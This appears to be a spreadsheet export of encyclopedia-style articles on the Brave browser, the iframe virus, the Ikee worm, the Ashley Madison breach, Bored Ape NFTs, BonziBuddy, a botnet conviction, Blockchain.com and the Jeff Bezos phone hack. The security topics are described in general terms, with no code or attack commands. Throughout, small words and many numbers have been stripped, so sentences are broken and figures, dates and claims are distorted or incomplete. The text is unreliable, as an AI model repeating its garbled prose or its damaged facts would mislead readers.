peer-to-peer networking protocol. blockchain domain names: march 2021, brave supports decentralized domains, namely ones provided unstoppable domains (.crypto etc.) ethereum name services (ens). news aggregator: december 2020, brave integrated personalized news reader focused user privacy browser. renamed brave today brave news 2021. june 2021, news feed also includes promoted articles based upon brave platform. wayback machine integration: february 2020, wayback machine integrated browser. upon hitting http error, among error codes, wayback machine automatically queried display cached version page. brave playlist: feature lets users create playlists containing content variety media sources, including audio video streams. de-amp: 2020, brave began roll update mobile clients would automatically bypass google's pages. basic attention token "basic attention token" (bat) cryptocurrency token based ethereum, created open-source, decentralized exchange platform cryptocurrency. based erc-20 standard. initial coin offering 2017, brave sold billion total 156,250 ethereum ($35 million) less seconds. additional million retained company used promote adoption platform.in early december 2017, company disbursed first round "user growth pool" grants: total 300,000 distributed users first-come, first-served basis. tokenomics basic attention token's tokenomics based upon cycle user, creator advertiser. advertisers must purchase show brave rewards platform (brave facilitates usd-based purchases, behalf advertiser). these shown user, user receives spent minus going brave. users creators using "brave creators" platform (creators hosts websites user visited literal creators platforms youtube), withdraw verified gemini uphold wallet.the price token thus supported advertisers buying campaigns users creators selling bat, addition regular trading cryptocurrency exchanges. inter-chain operability binance smart chain march 2021, became available form wrapped bat. these tokens wrapped binance original held "token vaults" binance. contract address bep-20 0x101d82428437127bf1608f699cd651e6abf9766e partnerships htc: december 2018, brave partnered make brave browser default browser exodus reception january 2016, reaction brave software's initial announcement, sebastian anthony technica described brave "cash-grab" "double dip". anthony concluded, "brave interesting idea, generally rather frowned upon stick front someone else's". techcrunch, computerworld, engadget termed brave's replacement plans "controversial" 2016. february 2016, andy patrizio network world reviewed pre-release version brave. patrizio criticized browser's feature "mighty primitive", lauded performance: "pages load instantly. can't really benchmark page loads since happen faster start/stop stopwatch".in april 2016, newspaper association america, david chavern, said brave's proposed replacement advertising "should viewed illegal deceptive courts, consumers, value creation content".in april 2017, techworld praised brave's "great speeds advanced ad-tracking controls", said "extension functionality still lacking".in november 2019, cnet reviewed newly released version brave. they praised speed, saying "brave hands-down fastest browser i've used year operating system, mobile desktop. memory usage browser others, website loading faster." they also said battery usage could reduced using browser "with less strain resources comes less strain device's battery life well." however, concerns user base still chrome, thus able build system fully yet, saying "the browser need users, however, truly build system: million people good start, still need compete google chrome's billion-plus users."in march 2021, york times analyzed internet browsers recommended brave best privacy browser. writer brian chen concluded, favorite websites loaded flawlessly, enjoyed clean look ad-free sites, along flexibility opting whenever felt like it." controversies brave browser collecting donations behalf content creators december 2018, british youtube content creator scott said received donations collected behalf brave. tweet, stated thought donated brave, money pseudo-money [bat]) reach brave's terms choose keep themselves. looks like they're 'providing service' every creator every platform. opt-in, consent." response, brave amended interface disclaimer creator signed brave promised consider adding opt-out option creators wish receive donations" "switching default users cannot donate unverified creators".critics stated system opt-in opt-out, disclaimer clearly state absence relation creators, suggests creator begun process signing brave. days complaint, brave issued update "clearly indicate publishers creators joined brave rewards users better control donate tip" january 2020 another update change behavior contributions tips. they held browser transferred creator signs within days; otherwise, returned user. scott, original complainant, tweeted response: "these good changes, complaints had!". insertion referral codes june 2020, twitter user pointed brave inserts affiliate referral codes users navigate binance. further research revealed brave also redirected urls cryptocurrency exchange websites. response backlash users, brave's apologized called "mistake" said "we're correcting".two days later, brave released version said disabled auto-completion partner links, followed blog post explaining issue apologizing. "private window tor" leaks privacy issue, promptly patched, appeared private disclosure brave's hackerone bounty platform january 2021. disclosure reported brave sending requests users instead routing network, thus allowing isps knowledge user's browsing sessions.brave fixed issue nightly channel soon initially reported. once received public attention mid-february twitter users verifying vulnerability, soon uplifted stable channel landed brave 1.20.110. forks april 2019 created fork brave called dissenter bundled add-on name banned chrome firefox stores. eich criticized decision fork brave unnecessary "parasitic". comparison browsers february 2020 research report published school computer science statistics trinity college dublin tested browsers deemed brave private them, terms phoning home: first (most private) group lies brave, second chrome, firefox safari, third (least private) group edge yandex." references</t>
  </si>
  <si>
    <t>Iframe virus</t>
  </si>
  <si>
    <t>iframe virus malicious computer code, considered form malware, infects pages websites, using iframe html code, cause damage injecting &lt;iframe&gt; tags website. code injected html, source files. virus make presence known scanning home page files index.php, index.html default.html inject iframe code them. iframe code usually found near beginning page. they also infect themes templates content management systems. virus also modify .htaccess hosts files, create images.php files directories named 'images'. infection server-wide exploit, infect sites server passwords to.this recent surge compromised servers generated discussions online forums blogs. malware infections hurt businesses; google, firefox, internet explorer anti-virus companies blacklist infected sites, businesses lose revenue sites suffer damage brand reputation.an iframe virus type badware. "badware producers constantly developing new, creative ways install badware onto computer". badware distribution expanded beyond traditional channels like email viruses harder-to-avoid methods like automated “drive-by downloads” launched compromised pages. iframe variants sometimes iframe virus variants come form javascript. iframe tags seen plain text source encoded. encoded script code decoded, contain code invoke iframe javascript. references</t>
  </si>
  <si>
    <t>Ikee</t>
  </si>
  <si>
    <t>ikee worm spread secure shell connections jailbroken iphones. discovered 2009 changed wallpapers photo rick astley.the code ikee later used make malicious iphone malware, called duh. history iphone owners australia reported smart phones infected worm changed iphone wallpaper rick astley, 1980s singer. affected smartphones owner change default password installation ssh. once ikee worm infected, would find iphones mobile network vulnerable infect well. worm affect users jailbroken installed iphone. worm nothing changing infected user's lock screen wallpaper. source code ikee worm says written ikex.two weeks release ikee, malicious worm dubbed "duh", built code ikee, discovered. acted botnet, communicating command control center. also attempted steal banking data direct. also brain test dendroid (malware) computer virus file binder individual mobility malware trojan horse (computing) worm (computing) mobile operating system references</t>
  </si>
  <si>
    <t>Impact Team</t>
  </si>
  <si>
    <t>july 2015, group calling "the impact team" stole user data ashley madison, commercial website billed enabling extramarital affairs. group copied personal information site's user base threatened release users' names personally identifying information ashley madison would immediately shut down. august, group leaked gigabytes company data, including user details. because site's policy deleting users' personal information including real names, home addresses, search history credit card transaction records many users feared publicly shamed. timeline impact team announced attack july 2015 threatened expose identities ashley madison's users parent company, avid life media, shut ashley madison sister site, "established men".on july 2015, website three statements "media" section addressing breach. website's normally busy twitter account fell silent apart posting press statements. statement read: time, able secure sites, close unauthorized access points. working enforcement agencies, investigating criminal act. parties responsible cyber-terrorism held responsible. using digital millennium copyright (dmca), team successfully removed posts related incident well personally identifiable information (pii) users published online. site also offered waive account deletion charge. although ashley madison denied reports mass release customer records occurred july, gigabytes worth data confirmed valid august. information released bittorrent form gigabyte compressed archive link posted dark site accessible anonymity network tor. data cryptographically signed key. message, group blamed avid life media, accusing company deceptive practices: explained fraud, deceit, stupidity members. everyone gets data alm, promised secrecy deliver."in response, avid life media released statement company working authorities investigate, said hackers "hacktivists" criminals. second, larger, data dump occurred august 2015, largest file comprised 12.7 gigabytes corporate emails, including noel biderman, avid life media.in july 2017, avid life media (renamed ruby corporation) agreed settle dozen lawsuits stemming breach $11.2 million. impact ethics none accounts website need email verification profile created, meaning people often create profiles fake email addresses. ashley madison's company required owner email account money delete profile, preventing people accounts without consent prank mistyped email) deleting without paying. hackers allege avid life media received $1.7 million year people paying shut user profiles created site. company falsely asserted paying would "fully delete" profiles, hack proved untrue.josh duggar notable user ashley madison whose data breached. following hack, communities internet vigilantes began combing find famous individuals, planned publicly humiliate. france24 reported 1,200 saudi arabian '.sa' email addresses leaked database, extortionable fact adultery punishable death saudi arabia. several thousand u.s. .mil .gov email addresses registered site. days following breach, extortionists began targeting people whose details included leak, attempting scam us$200 worth bitcoins them. company started offering "search engine" people could type email addresses colleagues spouse website, email address database leak, company would send letters threatening details exposed unless paid money company.a variety security researchers internet privacy activists debated media ethics journalists reporting specifics data, names users revealed members. number commentators compared hack loss privacy 2014 celebrity photo hack.clinical psychologists argued dealing affair particularly public increases hurt spouses children. carolyn gregoire argued "social media created aggressive culture public shaming individuals take upon inflict psychological damage" often not, "the punishment goes beyond scope crime." graham cluley argued psychological consequences people shamed could immense, would possible bullied suicide. charles orlando, joined site conduct research women cheat, wrote concern spouses children outed cheaters, saying "the internet willing serve judge, jury, executioner" site members deserve flogging virtual town square millions onlookers".on august 2015, toronto police announced unconfirmed suicides linked data breach, addition "reports hate crimes connected hack." unconfirmed reports u.s. died suicide. least suicide, previously linked ashley madison, since reported "stress entirely related issues work connection data leak".on august 2015, pastor professor orleans baptist theological seminary killed citing leak occurred days before.users whose details leaked filing $567 million class-action lawsuit avid dating life avid media, owners ashley madison, canadian firms charney lawyers sutts, strosberg llp. july 2017, owner ruby corp. announced company would settle lawsuit $11.2 million. 2019 interview, ashley madison's chief strategy officer paul keable confirmed installment security features like two-factor verification, compliance fully-encrypted browsing consequence hacker attack 2015. data analysis annalee newitz, editor-in-chief gizmodo, analyzed leaked data. initially found roughly 12,000 million registered female accounts used regular basis, equal every 1000, less remaining used time, registered. also found high number women's accounts created address, suggesting many fake accounts. found women checked email messages infrequently: every time woman checked email, 13,585 checked theirs. only 9,700 million female account ever replied message, compared million would same. concluded that, "the women's accounts show little activity might well there". subsequent article following week newitz acknowledged "misunderstood evidence" previous article, conclusion females active site actually based data recording "bot" activities contacting members. notes absolutely data recording human activity ashley madison database dump impact team. fake humans contacted real ones."passwords live site hashed using bcrypt algorithm. security analyst using hashcat password recovery tool dictionary based rockyou passwords found among 4,000 passwords easiest crack, "123456" "password" commonly used passwords live website. analysis passwords used archived version showed "123456" "password" commonly used passwords. design error passwords hashed bcrypt md5, million passwords eventually cracked.claire brownell suggested turing test could possibly passed women-imitating chatbots fooled millions buying special accounts. also internet vigilantism online shaming references</t>
  </si>
  <si>
    <t>Bored Ape</t>
  </si>
  <si>
    <t>bored yacht club (bayc), often colloquially called bored apes bored ape, non-fungible token (nft) collection built ethereum blockchain. collection features profile pictures cartoon apes procedurally generated algorithm. parent company bored yacht club yuga labs. project launched live pre-sale april 2021 first minted april 2021 owners bored granted access private online club, exclusive in-person events, intellectual property rights image. 2022, sales bored yacht club nfts totaled us$1 billion. various celebrities purchased non-fungible tokens, including singer justin bieber, television host jimmy fallon, rapper snoop dogg, rapper eminem, singer madonna, neymar, paris hilton, timbaland, steve aoki. development function according bored yacht club (bayc) website, collection created four friends "set make dope apes, test [their] skills, build something (ridiculous)." bored nfts, like nfts created used digital purposes provide owners "original" artwork. bored nfts owners considered possession unique unit data recorded digital blockchain, permanently records provenance sales history."the collection exists ethereum blockchain contains 10,000 unique nfts derived unique assets. nfts function dually membership card yacht club. membership club includes access bathroom (stylized caps), digital graffiti board. nfts originally sold 0.08 ether each, around $190 time april 2021 launch sold hours.as bayc "has made clear holders full commercialization rights ape," bored apes differ nfts "whoever owns bored spin whatever film, music, book, media project want." founders founders bayc, going pseudonyms "gargamel" "gordon goner", describe "literary bros". told yorker initially bonded arguing work david foster wallace. interview coindesk, "they evoked austrian-british philosopher ludwig wittgenstein's idea unutterable describe [bored apes]." grew together miami. founders pseudonyms sass" "emperor tomato ketchup". latter derived alias 1996 stereolab album name, named 1971 film.in february 2022, gargamel gordon goner's identities revealed greg solano wylie aronow, respectively, buzzfeed news. upon reveal, nicole muniz, yuga labs confirmed buzzfeed's report. solano aronow went twitter, commenting doxxed uploaded images next bored profile pictures. solano writer editor, sass emperor ketchup programmers. aronow documented planning attend program, falling becoming cryptocurrency trader.solano aronow brought friends theirs, sass emperor tomato ketchup, programmers could handle blockchain coding. latter knowledgeable computer science, studied field university solano attended; however, "were crypto-savvy," written first lines solidity code, language used smart contracts, february 2021. concept design solano aronow came concept shared digital canvas: anyone bought could draw it." they likened canvas used similar bathroom dive bar; idea stuck two, created science-fiction storyline centered around interview yorker, aronow elaborated concept, centered early cryptocurrency investors becoming billionaires: they're fucking bored. what wealthy beyond wildest dreams? you're going hang swamp club bunch apes weird. aronow clarified apes chosen mascot cryptocurrency phrase aping meaning currency abandon, risking significant amount money.all seeing seneca, simply seneca, asian-american artist credited lead designer artwork featured bored nfts. seneca clarified sole illustrator artwork, "lead artist original collection" ape's body "exactly line-for-line" drawing.bayc co-founder gargamel stated "thomas dagley, migwashere, couple chose remain anonymous" handled traits environments. seneca however, "develop major traits, like grinning mouth, popping eyes, beanie." gargamel stated "struck" expressiveness seneca's characters "for apes, arrived exactly mood after: existential boredom." although unable share specifics, seneca state financial compensation ideal, stated "not people know drawings, terrible artist." post-launch after bored nfts became popular, yuga labs hired artists, social media managers, discord community managers, cfo. response popularity surrounding bored ape, aronow stated bayc aiming "web3 lifestyle company." company released secondary assets like bored kennel club, mutant serum, mutant yacht club, increased bayc's worth, brought users ecosystem rewarded previous holders investors. march 2022, announced yuga labs acquired cryptopunks meebits intellectual property undisclosed sum. yuga labs stated granting complete commercial rights cryptopunks owners.on march 2022, apecoin launched token separate yuga labs known "apecoin" ($ape).on april 2022, official instagram account company hacked phishing link posted result, four bored nfts, along related collections yuga labs, stolen total estimated worth approximately million. million worth funds transferred hacker's account.on april 2022, yuga labs launched metaverse otherside, collaboration animoca brands. bored nfts feature music video eminem snoop dogg's song "from lbc". reception popularity celebrity collectors bored apes documented media prominent nfts. december 2021, bored yacht club overtook cryptopunks highest-priced nfts. bored apes, along character-based nfts, would become status symbol owners regularly animated creatures avatars social media." many bored owners admitted purchasing apes potential marketing branding projects launched owning intellectual property bored nft. november 2021, rolling stone released bored magazine covers magazine. universal music group signed band composed three bored apes mutant ape.on january 2022, markets insider wrote "since inception, collection amassed around 11,000 unique owners, according cryptoslam. average, sold ether roughly $344,000 publishing." companies also noted purchase bored nfts; adidas bought september 2021. many online media publications wrote celebrities collecting bored apes late 2021 early 2022; eminem, gwyneth paltrow, shaquille o'neal, neymar, snoop dogg, mark cuban, post malone, stephen curry, paris hilton, jimmy fallon, serena williams among various celebrities noted purchased bored apes. cases celebrities owning bored nfts, justin bieber, reported actual purchase made celebrity themselves.bored yacht club holds hosted events york, california, hong kong, owners. november 2021, company held yacht party performance featuring chris rock, aziz ansari, strokes part entertainment weekend york. copycat projects late 2021, popularity bored apes spurred copycat projects phayc phunky yacht club copycat projects centered around idea selling nfts mirrored otherwise identical images bored nfts. opensea marketplace banned projects december 2021. february 2022, bored wukong accused copycat avatars. controversies june 2022, yuga labs launched lawsuit ryder ripps grounds selling nfts infringe company's copyright. although yuga labs filed lawsuit court, seek copyright protection algorithmically generated images like bayc subject copyright protection.ripps accused false advertising trademark infringement, yuga labs requesting financial reimbursement saying ripps executing "calculated, intentional, willful" plan damage reputation project. ripps made statement saying buyers nfts informed related bayc project nfts satirical response yuga labs.on august 2022, ripps filed anti-slapp motion dismiss lawsuit. artistic merits criticism bored nfts attracted considerable amount negative reception, many detractors bayc opined nfts negative impact artists. nevertheless, bored design positively received; samantha hissong rolling stone wrote "bored valuable visually pleasing, even though it's valuable also serves digital identity." emma roth verge wrote apes "very interesting-looking sometimes fashionable." cited intelligencer january 2022, roman kräussl, art-finance professor university luxembourg stanford university's hoover institution, stated works like bored apes addition cryptopunks cool cats) already become iconic.writing cut, claire lampen commented, find monkey mostly unremarkable, generically familiar, much liking wholly offensive," added "[celebrities] really want enjoy monkey, clap monkey, know monkey they can't make them." jonathan jones guardian critical bored apes nfts' impact digital art. jones opined "should romanticism art. puts consumer experience first absolutely nothing empowering artists. it's collector's ego." also wrote "the attitude says all. bored, emptied out, wrecked, proud that's investors feel, apparently. should. nfts good art. they liberating artists."a tonight show jimmy fallon segment featuring fallon paris hilton showing bored apes mocked users twitter. wired described segment "stiff, cheery cadence infomercial", wrote clip going viral "fueled people making off-putting was". writing publication, kate knibbs wrote negatively bored apes, contrasted comedian, 2019 artwork maurizio cattelan banana duct taped wall, buyer received instructions recreating artwork rather actual banana: bored yacht club, contrast, grimmer kind gimmick, parodies nothing. uses certificates authenticity, too, crucial difference intent. certificate points back commodity, idea. mock even question world; instead simply cashes project's sense humor akin decal calvin calvin hobbes taking piss. crudeness point. each misprized thing, bought sold constantly. also bored hungry cryptokitties cryptopunks rare pepe list expensive non-fungible tokens references further reading lee, justina (september 2021). "day-trading army goes all-in nfts meme-stock mania ebbs". bloomberg news. retrieved february 2022. morse, jack (august 2021). "nft owners insist they're totally owned 'right-click savers'". mashable. retrieved february 2022. ongweso edward (january 2022). "'all apes gone': theft victims centralized saviors". vice. retrieved february 2022.</t>
  </si>
  <si>
    <t>Bored &amp; Hungry</t>
  </si>
  <si>
    <t>bored hungry cryptocurrency-themed fast food restaurant long beach, california. first concept food fighters universe, world's first restaurant group owned restaurateur andy nguyen. restaurant marketed around bored yacht club, series non-fungible tokens, payment accepted united states dollars cryptocurrency. store bored hungry located 2405 long beach, california. occupies 1,700 square foot (160 space formerly belonged fried chicken restaurant almost replaced vegan burger location. there seating inside restaurant, small menu consisting smashburgers, veggie burgers, french fries, soda. signature menu item trill burger, type smashburger multiple beef patties, caramelized onions, special sauce. customers purchase food traditional currency forms cryptocurrency: apecoin ethereum. history bored hungry owned andy nguyen, vietnamese immigrants came united states vietnam war. before bored hungry, nguyen created restaurants, including afters cream chain, locations california nevada. march 2022, nguyen purchased three non-fungible tokens (nfts) bored yacht club: bored #6184 mutant apes. doing gave intellectual property ownership rights three nfts, well access online community bored owners. bored #6184, became restaurant's logo, cost nguyen $267,000, mutant apes cost additional $65,000 $75,000 each.bored hungry opened april 2022, attracting 1,500 customers opening. originally planned 90-day pop-up restaurant, success bored hungry upon opening nguyen make restaurant permanent.following cryptocurrency stock market crash, angeles times reported june bored hungry accepting payment united states dollars. nguyen responded article twitter, calling report "fake news" stating bored hungry "still always accept apecoin store". references</t>
  </si>
  <si>
    <t>BonziBuddy</t>
  </si>
  <si>
    <t>bonzibuddy bon-zee-bud-ee, stylized bonzibuddy) freeware desktop virtual assistant created bonzi. upon user's choice, would share jokes facts, manage downloads, sing songs, talk, among functions. bonzibuddy described spyware adware, discontinued 2004 company behind faced lawsuits regarding software ordered fines. bonzi's website remained open discontinuation bonzibuddy, shut 2008. design software used microsoft agent technology similar office assistant, originally sported peedy, green parrot characters available microsoft agent. later versions bonzibuddy 2000 featured character: bonzi, purple gorilla. program also used text-to-speech voice interact user. voice called sydney taken lernout hauspie microsoft speech package. often referred software adult male number sources identify bonzibuddy spyware, claim company disputed. 2002, article consumer reports watch labelled bonzibuddy spyware, stating contains backdoor trojan collects information users. activities program said engage include constantly resetting user's browser homepage bonzi.com without user's permission, prompting tracking various information user, installing toolbar, serving advertisements.trend micro symantec classified software adware. spyware guide's entry program also states adware. reception april 2007, world readers voted bonzibuddy sixth list named "the most annoying tech products". reader quoted criticizing program "kept popping obscuring things needed see".one last newspaper articles written bonzibuddy still distribution described spyware "scourge internet". another article found 2006 businessweek website described bonzibuddy "the unbelievably annoying spyware trojan horse". lawsuits internetnews.com reported settlement class action suit 2003. originally brought bonzi software december 2002, suit accused bonzi using banner advertisements deceptively imitate windows computer alerts, alerting user address broadcast. settlement, bonzi software agreed modify looked less like windows dialog boxes like actual advertisements.on february 2004, federal trade commission released statement indicating bonzi software, inc. ordered $75,000 fees, among aspects, violating children's online privacy protection collecting personal information children bonzibuddy. also digital prody parrot talking moose references</t>
  </si>
  <si>
    <t>Jdbgmgr.exe virus hoax</t>
  </si>
  <si>
    <t>jdbgmgr.exe virus hoax involved e-mail spam 2002 advised computer users delete file named jdbgmgr.exe computer virus. jdbgmgr.exe, little teddy bear like icon (the microsoft bear), actually valid microsoft windows file, debugger registrar java (also known java debug manager, hence jdbgmgr). email taken many forms, including saying purpose warn hotmail users virus spreading messenger, alert possible virus orkut community. message right) went detected mcafee norton antivirus, obviously true. variant related file "bugbear" virus, genuine virus, prevalent time.the effect deleting file restricted java developers used microsoft visual v1.1. little effect users simply developer tool. microsoft bear icon jdbgmgr.exe, microsoft bear, mascot microsoft windows development team, alongside 16-bit bunny 32-bit bunny, represented transition 32-bit computing release windows unusual icon similar viruses time, parrot, making virus hoax believable. microsoft bear featured several easter eggs within windows 3.1, including hidden credits screen email addresses developers could found. 2002, microsoft stopped including easter eggs software part trustworthy computing initiative, risk exploits security flaws could introduced features users unaware also list hoaxes references external links symantec's description</t>
  </si>
  <si>
    <t>Jeanson James Ancheta</t>
  </si>
  <si>
    <t>2006, jeanson james ancheta (born april 1985) became first person charged controlling large numbers hijacked computers botnets. biography ancheta going downey high school downey, california 2001 dropped school. later entered alternative program students academic behavioral problems. worked internet cafe according family wanted join military reserves. around june 2004 started work botnets discovering rxbot, common computer worm could spread infected computers. botnets botnet jargon term collection software robots, "bots", autonomously automatically. hijacked somewhere area half million computer systems. this affected computers like home, allowed others orchestrate large-scale attacks. arrest sentence november 2005 captured elaborate sting operation agents lured local office pretext collecting computer equipment. arrest part operation: roast.on 2006 ancheta pleaded guilty four felony charges violating united states code section 1030, fraud related activity connection computers, specifically subsections (a)(5)(a)(i), 1030 (a)(5)(b)(i), 1030(b). ancheta must serve months prison, forfeit 1993 $58,000 profit. must also restitution $15,000 u.s. federal government infecting military computers. also list convicted computer criminals references external links department justice</t>
  </si>
  <si>
    <t>Blockchain.com</t>
  </si>
  <si>
    <t>blockchain.com (formerly blockchain.info) cryptocurrency financial services company. company began first bitcoin blockchain explorer 2011 later created cryptocurrency wallet accounted bitcoin transactions 2012 2020. also operates cryptocurrency exchange provides institutional markets lending business data, charts, analytics. corporate affairs blockchain.com private company. company peter smith, three founders. company's board members include: smith; co-founder nicolas cary; antony jenkins; messina, former deputy chief staff barack obama, jeremy liew, partner lightspeed venture partners.between 2012 february 2021, company raised total $190 million venture capital funding. march 2021, raised additional $300 million investment. investors company include partners global, lightspeed venture partners, capital, baillie gifford, lakestar, eldridge, kyle bass, access industries, moore strategic ventures rovida advisors. history blockchain.info established reeves 2011. launched website could used track bitcoin transactions. website block explorer, website allowed bitcoin users details public cryptocurrency transactions identifying hash code transaction.in early 2012, reeves brian armstrong, co-founder crypto-currency exchange coinbase, applied combinator's summer class. they proposed payment platform bitcoin users could keep digital wallet, exchange currency bitcoins percentage fee, make payments bitcoin. different opinions parted ways prior attending combinator. reeves wanted create platform users controlled access bitcoin information, armstrong felt platform retain custody users wallets. after parting ways armstrong, reeves continued work blockchain.info.from 2013 2014, blockchain's user base grew 100,000 wallet users early 2013 million april 2014. 2014, blockchain.com popular bitcoin wallet nicolas cary ceo. acquired companies, zeroblock 2013, rtbtc early 2014, added data analytics services, brought services together umbrella. december 2013, blockchain.com acquired zeroblock, bitcoin pricing. following year, acquired data analytics platform rtbtc. integrated rtbtc's technology existing services, establishing platform offering cryptocurrency wallet, pricing analytics, cryptocurrency explorer.in february 2014, apple inc. removed blockchain.com store, prompting public outcry bitcoin community, notably within reddit community. time, bitcoin wallet available apple users, apple removed denied apps. july 2014, apple reinstated blockchain.com app.during 2014, peter smith joined founding team ceo. three founders, reeves, cary smith worked reeves' flat york formally established company bitcoin investor roger provided initial funding. october 2014, million consumer wallets raised $30.5 million first external fundraising round, investors including lightspeed venture partners mosaic ventures. this biggest round financing digital currency sector time. world economic forum named company 2016's "technology pioneers". 2017, company carried second round fundraising. closed million funding june company valued $280 million.in 2018, blockchain started selling services institutional cryptocurrency. july 2019, blockchain.com launched cryptocurrency exchange, promoted faster others. september 2020, company joined coalition fairness aims negotiate better conditions inclusion apps stores. mid-2018, company acquired tsukemen, app-development startup company based francisco.in 2020 company million users 2021, million blockchain.com wallets bitcoin transactions since 2012 initiated received blockchain.com wallet. february 2021, blockchain.com raised $120 million funding round investors including moore strategic ventures, kyle bass, access industries, rovida advisors, lightspeed venture partners, lakestar, eldridge. including previous venture capital funding rounds, company raised $190 million altogether. month later, company announced $300 million fundraising round. third amount raised funded investment firm baillie gifford invested $100 million. based fundraising round, company valued $5.2 billion. 2022, blockchain.com's wrote shareholders informing three arrows capital rapidly becoming insolvent meant default impact approximately $270 million worth cryptocurrency dollar loans blockchain.com. firm laid staff, people, july products services cryptocurrency company, blockchain.com provides platform holding, using, managing crypto assets, exploring cryptocurrency transactions. also develops financial services standards infrastructure cryptocurrencies. company's platform provides market data analytics. follows cryptocurrency's aims decentralized anonymous; cryptocurrency products managed user accessible blockchain.com itself.its main products cryptocurrency wallet, exchange, block explorer, institutional markets offering. wallet company offers hosted cryptocurrency wallet method store cryptocurrency digital file accessed online. wallet used different cryptocurrencies stablecoins. wallets used send receive digital currency transactions, well swap different cryptocurrencies. blockchain.com non-custodial wallet, meaning controlled completely user company access wallet's data. users access wallet private key, recovery phrase known user. exchange cryptocurrency exchange helps convert digital assets money money digital assets. they work like stockbroker. company exchange allow users buy, sell, trade cryptocurrencies. additionally, exchange's user interface customized traders show relevant information depending level experience. institutional markets business addition services individuals, blockchain.com also provides institutional investors cryptocurrency-based financial services. company's institutional markets business provides cryptocurrency lending, borrowing, trading custody financial assets. also carries over-the-counter transactions large traders, acting broker keep trades private prevent price swings occurring based market knowledge trades. explorer company operates blockchain explorer allows user public cryptocurrency transactions related information. this allows anyone transaction's hash code addresses wallets transaction sent received amount transaction, fees. tool used analysis transaction activity, cryptocurrency data, analytics. company sells advertising otherwise free service. also list bitcoin companies references external links blockchainbdgpzk.onion (accessing link help)</t>
  </si>
  <si>
    <t>Jeff Bezos phone hacking incident</t>
  </si>
  <si>
    <t>january 2020, consulting company claimed november 2019 "medium high confidence" phone jeff bezos hacked file sent whatsapp account crown prince saudi arabia, mohammed salman. saudi arabian embassy united states denied allegations. billionaire jeff bezos, owner washington post newspaper founder company amazon, engaged consulting february 2019 national enquirer january 2019 reported details bezos's affair. consulting link national enquirer hack. background starting september 2017, washington post—which owned bezos—published series columns jamal khashoggi critical saudi arabia salman. april 2018, bezos attended small dinner salman exchanged whatsapp numbers. bezos salman proceeded exchange friendly messages. khashoggi murdered october 2018; washington post reporting became increasingly critical role saudi regime salman murder. alleged incident according united nations analysis evidence surveillance bezos's phone, following events occurred 2018:a message crown prince account sent bezos whatsapp. message encrypted video file. later established, reasonable certainty, video’s downloader infects bezos' phone malicious code. investigations january 2019, national enquirer released details bezos conducted affair. bezos security specialist gavin becker lead investigation national enquirer obtained information.in february 2019, bezos wrote post medium, accusing national enquirer parent company american media, inc. (ami) extortion blackmail images affair. post, bezos referenced investigated "various actions they've taken behalf saudi government", stated reporting washington post killing jamal khashoggi undoubtedly unpopular certain circles".later february 2019, bezos becker hired digital forensic experts consulting company analyse bezos's iphone. wall street journal later reported bezos want give phone directly federal bureau investigation (fbi); thus consulting work. some consulting workers previously worked fbi. wall street journal also reported consulting communicated enforcement officials work.in march 2019, becker wrote article daily beast, stating bezos' "investigators several experts concluded high confidence saudis access bezos's phone, gained private information". becker also reported presented details investigation enforcement officials; furthermore, said "close relationship" salman american media david pecker. highlighted attempted publicly declare investigation bezos's phone found used "eavesdropping hacking newsgathering process", demanded declaration ami's story "influenced manner external forces". lastly, becker stated "unclear" whether knew alleged hack saudis.in april 2019, bezos interviewed federal investigators researching whether israeli technology company group conducted hacks people companies united states. november 2021, probes u.s. government public action national enquirer saudi arabia.in november 2019, consulting finished compiling report forensic analysis bezos's phone.the guardian broke story january 2020 results analysis bezos's phone, reporting analysis indicated highly likely bezos's phone infiltrated malicious video file sent salman's whatsapp account. consulting's conclusion made "medium high confidence", report stated. full forensic report published motherboard january 2020.the report stated "hours" bezos received file salman, phone began transmitting dramatically higher amounts data, continued months. video file infected, downloader file could analyzed investigators encrypted whatsapp. report points pieces circumstantial evidence: first, november 2018 message salman bezos includes image resembling woman bezos affair with, despite affair public knowledge time; second, february 2019 text salman bezos urges bezos believe everything, bezos briefed phone regarding internet campaign conducted saudis. report states investigators' belief salman's advisor, saud al-qahtani, obtained hacking software. report link national enquirer hack.the united nations special rapporteur summary executions extrajudicial killings agnès callamard special rapporteur freedom expression david kaye reviewed forensic analysis bezos' phone. january 2020, callamard kaye stated "the allegations also reinforced evidence saudi targeting dissidents perceived opponents". they noted phones hacked 2018 june 2018, belonging khashoggi associates (yahya assiri omar abdulaziz), amnesty international official, saudi dissident ghanem al-dosari. experts stated: "during period, bezos widely targeted saudia social media alleged adversary kingdom. this part massive, clandestine online campaign bezos amazon, apparently targeting principally owner washington post." result, callamard kaye called "immediate investigation" relevant authorities alleged phone hacks, "including investigation continuous, multi-year, direct personal involvement crown prince efforts target perceived opponents." reaction allegations february 2019, adel al-jubeir, minister state foreign affairs saudi arabia, announced country "absolutely nothing hacking".in march 2019, released statement responding becker's column source story bezos michael sanchez, brother bezos's girlfriend, involvement third party whatsoever." year later, michael sanchez sued ami, stating court documents national enquirer first contacted him, already "raunchy text messages nude selfies exchanged" bezos sanchez's sister. michael sanchez denied giving explicit photos, accused hacking bezos's phone.in january 2020, twitter account kingdom's u.s. embassy explicitly rejected claim saudi arabia behind hack, called investigation incident. analysis guardian speculated january 2020 hacking allegation would weaken salman's ability attract western investors saudi arabia lead renewed scrutiny murder khashoggi salman's involvement. outlet also reported saudi experts believed bezos hacked washington post's coverage saudi arabia. coverage included khashoggi's criticism salman. spoke guardian andrew miller, middle east expert served national security council president obama, claimed bezos' targeting crown prince reflects personality-centric situation saudi politics.the washington post january 2020 quoted security researchers saying "bezos probably fell victim iphone's achilles' heel: defenses difficult penetrate sophisticated attackers largely undetected." reasons weakness iphone apple, company producing iphones, "employs secretive approach finding fixing security", stated researchers.united nations special rapporteurs agnès callamard david kaye stated january 2020 alleged hacking suggests effort influence, silence, washington post's reporting saudi arabia", salman possibly part operation. they declared alleged hacking relevant issue whether salman involved killing jamal khashoggi, worked washington post.mit technology review offered opinion january 2020 consulting's report "lacks conclusive evidence", noting fails decisively identify specific spyware used bezos.motherboard january 2020 quoted mobile forensic expert sarah edwards fti's results, reported january 2020, complete. edwards pointed lack analysis core files, "where state-sponsored malware going found". meanwhile, vladimir katalov, leader forensics company, opined motherboard seemed "experts qualified enough".alternatively, jody westby writing forbes, suggested hack owed economic reasons. references external links thank you, pecker february 2019 post medium jeff bezos accusing extortion blackmail bezos investigation finds saudis obtained private data march 2019 column daily beast gavin becker, accusing saudis hacking bezos's phone project cato november 2019 report consulting forensic examination jeff bezos's phone experts call investigation allegations saudi crown prince involved hacking jeff bezos' phone january 2020 press release united nations special rapporteurs 